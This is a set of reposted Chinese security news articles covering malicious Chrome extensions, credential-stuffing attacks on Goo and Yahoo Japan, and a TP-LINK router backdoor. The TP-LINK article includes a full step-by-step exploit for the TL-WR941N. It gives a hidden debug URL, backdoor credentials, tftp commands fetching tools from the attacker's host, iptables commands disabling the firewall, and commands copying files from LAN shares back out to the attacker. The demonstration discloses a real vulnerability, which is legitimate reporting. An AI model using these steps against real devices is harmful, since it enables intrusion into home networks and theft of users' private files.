  當使用者在安裝一個extension時,會跳出詢問的視窗,視窗上可以看到此extension所要求的可用permission。如果一個extension有了過高且不該有的permission時,配合content_scripts裡的code,即能執行一些惡意行為,如:在Facebook上自動發文或散播連結等惡意行為(http://blog.aegislab.com/index.php?op=ViewArticle&articleId=236&blogId=2),而update_url則能自動去更新extension,所以能不斷更新不同的惡意行為內容!

  Chrome自4.0版起,開始支援extension的功能,由於Chrome extension的開發方便,Chrome extension security就一直是個令人擔心的問題。舊版本的Chrome允許用戶在安裝Windows程式時可順便在Chrome上新增相關的extension,卻遭到第三方業者濫用,在未經使用者同意下安裝Chrome extension,衍生了許多問題。因此,Chrome在25.0版改進了extension的安全管理,需為Chrome Web Store的extension才可安裝,另外,關閉了extension自動安裝功能,安裝前必須經過使用者同意才行。

  但是,道高一尺、魔高一丈,事實證明從Chrome Web Store下載extension並不能保證它安全無虞,最新的惡意Chrome extension攻擊手法,結合social engineering,先在Chrome Web Store放置惡意extension,然後在最熱門的社交平台Facebook上,分享了一些吸引人的連結(還會使用當地的語系),因為是朋友分享的連結,減低了警覺性,再利用人的好奇心,點擊連結後,都會要你安裝extension,使用者不疑有他的安裝了extension,也因為社交平台的特性,受害的狀況很快就會傳播開來。受害的使用者會誤以為是帳號被盜取,但發現改完密碼問題並沒有解決,因為問題出在Chrome的extension上,必須將惡意的extension解除安裝方可解決問題!

  瀏覽器的plug-in是為了協助處理特殊類型的網頁內容,常見的有Adobe Flash Player、Java等plug-in!其中,Java因為其跨平台特性,是許多網頁開發人員所使用的程式語言和運算平台。近來,Java不斷的被爆出0-day漏洞,且在資安業者或Oracle發現前,就已被駭客透過瀏覽器針對漏洞展開攻擊,也由於有利可圖,這些漏洞很多都被包進了自動化攻擊程式裡,並在地下論壇等地方販售,一旦有了這些自動攻擊程式,傷害很快的就會散佈開來!最近最有名的新聞就是:Facebook、蘋果及微軟的工程師都因以支援Java的瀏覽器造訪被掛馬的網站,遭利用Java的漏洞成功入侵,導致資料可能外洩的情況發生,許多專家更呼籲使用者立即停用瀏覽器Java的plug-in!

  以上不難看出,Chrome 瀏覽器的兩大罩門:Extensions 和 Plug-ins,若要提升Chrome 瀏覽器的安全性,除了Google必須加強對Chrome Web Store的安全審查之外,使用者則避免安裝來路不明或過少使用者的extension,安裝時更要特別注意是否有不尋常的permission要求。另外,Chrome plug-in方面,如果沒特殊需求,盡量不要安裝過多或不需要的plug-in,已經安裝的plug-in則必須保持最新的版本,以防因為plug-in本身軟體的漏洞,導致不小心造訪惡意網頁時受害。

轉載自《義集思實驗室(AegisLab)安全研究部落格》

駭客攻擊襲捲全球 日本入口網站Goo外洩10萬筆用戶資料


駭客攻擊襲捲全球 日本入口網站Goo外洩10萬筆用戶資料

駭客攻擊襲捲全球 日本入口網站Goo外洩駭客攻擊事件不斷,日前,日本兩大入口網站Goo、Yahoo Japan在同一天遭受駭客攻擊,Goo高達10萬名用戶的帳號資料外洩,Yahoo Japan因為即時發現入侵行動,得以保全客戶資料。

Goo於4月2日晚間偵測到來自某些特定IP位址的持續性攻擊行為,攻擊者使用字典檔密碼攻擊法(dictionary attack) 試著登入大量帳號,平均每秒超過30次的登入行為,最終成功帶走10萬名用戶資料,包括信用卡帳號、銀行帳戶資訊、個人資料和Email…等,這也讓Goo不得不暫時停止這10萬個帳號的登入權限,Goo表示,未來將增加其偵測機制,同時會要求使用者更換更複雜的密碼。

資安專家指出,dictionary attack的成功率很低,為了提高成功率,駭客很可能也利用了使用者會在不同網站使用相同密碼的弱點,從其他網站取得密碼用以攻擊Goo。

在Goo受到攻擊的當天晚上,另一個入口網站Yahoo Japan的伺服器也同樣遭受攻擊,雖然駭客一度成功取得了127萬個使用者的資料,不過在資料對外傳送之前就被Yahoo Japan發現而中斷對外連線,駭客並未得逞。雖然兩起事件的發生時間相當接近,不過兩家公司都宣稱兩者之間沒有關聯。

其實Goo與Yahoo Japan同樣都面臨了用戶使用相同帳號密碼的問題,日本訊息技術推廣機構(Information-Technology Promotion Agency)的安全工程實驗室首席顧問Shinichiro Kagaya表示,最大問題在於人們的使用習慣,如果用戶沒有使用相同的密碼,即使某個網站的資訊被外洩,傷害也是有限。Yahoo Japan安全專家Kaoru Toda也認為,目前最嚴重的問題是,使用者在不同網路服務上使用相同的帳號密碼,一旦其他網站的帳密被竊,很容易就被應用至攻擊Yahoo Japan。

根據Yahoo Japan統計了2013年2/8~3/8間,來自個人電腦的攻擊次數以及被他們封鎖的數量,其中,攻擊次數最多的個人電腦,就發動了高達4265萬次的未遂攻擊,顯見此問題的嚴重性。

相關新聞:
日大型入口網站被駭 10萬會員帳號被攻破

轉載自《資安人科技網》

TP-LINK成隱私洩露最大渠道 70%用戶或受害


TP-LINK成隱私洩露最大渠道 70%用戶或受害

近期,「TP-LINK漏洞門」事件被CNVD( 國家信息安全漏洞共享平台 )曝光後,在社會上引起了極大的關注。由於TP-LINK的市場佔有率達到70%,很多網友擔心自己的信息是否被洩露。

據一位資深黑客介紹,TP-LINK路由器的後門漏洞危險程度遠遠大於目前披露的程度。他解釋,在攻擊漏洞的TP-LINK路由器時,並非一定要在本地連接路由器,而是可以通過遠程進入TP-LINK路由器,從而監控網友的所有上網行為,並且能夠竊取本地信息。也就是說,控制了用戶的TP-LINK路由器之後,也就可以監控用戶的上網行為,隨意從網友的電腦裡竊取一切信息,不管是隱私信息還是重要資料都可以信手拈來,而用戶根本不知道。

他做了一個演示,利用TP-LINK存在的後門漏洞,輕鬆的監控用戶的上網行為,用戶在QQ裡面聊了什麼,在淘寶上面買了什麼東西,他都能夠一目瞭然,在他的眼裡看來,用戶就是一個完全透明的人。而且,他還可以利用TP-LINK的漏洞進入用戶的電腦,不管用戶是在歐洲拍的婚紗照,還是在家裡和愛人拍的隱私照,只要他想盜取隨時都可以,完全沒有隱私可言。

他還介紹,TP-LINK的後門漏洞存在多年,一直都沒有被TP-LINK重視,而TP-LINK的市場佔有率達到70%以上。所以,很多隱私洩露都與TP-LINK有關,不然黑客怎麼可能獲得用戶的隱私照片和銀行賬號,很多都是利用TP-LINK的漏洞完成的,只是用戶根本不知道而已。國內用水星和迅捷的用戶也難免厄運,因為水星和迅捷都是TP-LINK的馬甲,只要能夠找到TP-LINK路由器的漏洞,就能隨意進入水星和迅捷路由器用戶的電腦。就目前來說,TP-LINK的路由器大多存在問題,要想保證絕對安全幾乎不大可能。

以下是黑客利用TP-LINK路由器後門漏洞盜取用戶信息的演示:

一、環境拓撲圖
TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖1 環境拓撲圖

拓撲圖說明:

1、PC2 使用公網IP,或者是連接公網的路由器下的DMZ設備 ;
2、TP-Link開啟遠程WEB訪問,示例中的8011為遠程WEB訪問端口 ;
3、PC2要開啟TFTP服務器 ;
4、TP-Link設備型號:TL-WR941N,實物圖請見附錄 。

二、操作步驟
1、在TP-Link設備聯網情況下開啟遠程WEB訪問,如圖2、圖3

TP-LINK成隱私洩露最大渠道 70%用戶或受害

2、PC2設備在聯網情況下,在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/start_art.html (xxx.xxx.xxx.xxx為TP-Link設備的WAN口IP,8011為遠程WEB訪問的端口號),等待1分鐘左右出現如下頁面,如圖4所示

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖4

3、PC2在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/linux_cmdline.html ,出現TP-LINK設備的登錄頁面,輸入設備管理的用戶名和密碼(用戶名:admin,密碼:admin),進入以下頁面(如圖5所示),這個頁面需要的用戶名是:osteam,密碼是:5up。在這個頁面我們就可以大展拳腳了。接下來我們就利用漏洞來訪問TP-link局域網下的共享

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖5

4、PC2開啟tftp服務器,並在tftp服務器路徑下放置 busybox / libbigballofmud.so / smbclient / smbtree 文件(後面會將這幾個文件通過tftp導入到TP-Link設備的/tmp目錄下)。在設備頁面的指令欄輸入 tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa為PC2的公網IP地址)。出現如下頁面(圖6)

TP-LINK成隱私洩露最大渠道 70%用戶或受害

7、在指令欄輸入 iptables -P INPUT ACCEPT / iptables -P FORWARD ACCEPT / iptables –F ,如圖9。這幾條命令是改變防火牆的過濾規則,操作後,該設備的防火牆就形同虛設了。

TP-LINK成隱私洩露最大渠道 70%用戶或受害

10、在telnet窗口輸入cd /tmp,進入該目錄後先後輸入 tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/ tftp -g -r smbclient aaa.aaa.aaa.aaa/ tftp -g -r smbtree aaa.aaa.aaa.aaa(這幾個命令是將libbigballofmud.so/smbtree/smbclient通過TFTP導入到TP-Link的/tmp目錄下,所以要確保PC2開啟TFTP服務器)。如圖12所示,已成功導入

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖12

11、在telnet界面輸入以下命令(如圖13所示)

mount tmpfs /usr -t tmpfs
/tmp/busybox mkdir -p /usr/lib
/tmp/busybox cp /tmp/*so* /usr/lib/ -fr
/tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0
chmod 777 smbtree
chmod 777 smbclient

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖13

12、在/tmp目錄下執行./smbtree命令,即可搜索到該局域網下的共享文件信息,圖14

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖14

13、執行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb為圖14搜索到的一個共享文件目錄),密碼為空,進入文件夾後執行ls,顯示該文件夾下的文件類容,如圖15

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖15

14、通過索引目錄,可以查詢到每一個目錄下的文件信息,如/mnt/files/cherryblossoms1.jpg。如圖16所示。接下來我們就看看cherryblossoms1.jpg是一個什麼圖片。

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖16

15、將共享文件拷貝到TP-Link設備上的/tmp目錄下,執行命令get ccc(ccc為要拷貝的共享文件,如圖17中的cherryblossoms1.jpg)

TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖17

16、將文件通過tftp拷貝到本地設備上,執行命令 /tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。如圖18所示

TP-LINK成隱私洩露最大渠道 70%用戶或受害
TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖20

注意事項:
1、TP-Link設備需要開啟遠程WEB訪問,示例中的8011為遠程WEB訪問的端口
2、本地設備最好使用公網IP,或者是連接公網的路由器下的DMZ設備
3、本地設備要開啟TFTP服務器
4、 busybox / libbigballofmud.so / smbclient / smbtree 需要拷貝在TP-Link下的/tmp目錄下
5、示例中的xxx.xxx.xxx.xxx為TP-link設備WAN口IP,aaa.aaa.aaa.aaa為PC2的公網IP,/ /bbbb/bbbbbb為搜索到的一個共享目錄,ccc為共享目錄下的一個共享文件
6、需要用到的工具有: tftpd32.exe 、 busybox 、 libbigballofmud.so 、 smbclient 、 smbtree

附錄: TL-WR941N 實物圖
TP-LINK成隱私洩露最大渠道 70%用戶或受害
圖21
TP-LINK成隱私洩露最大渠道 70%用戶或受害

延伸閱讀:
多款路由器被爆嚴重漏洞 駭客可遠端接管完全控制

轉載自《中國日報網-財經頻道》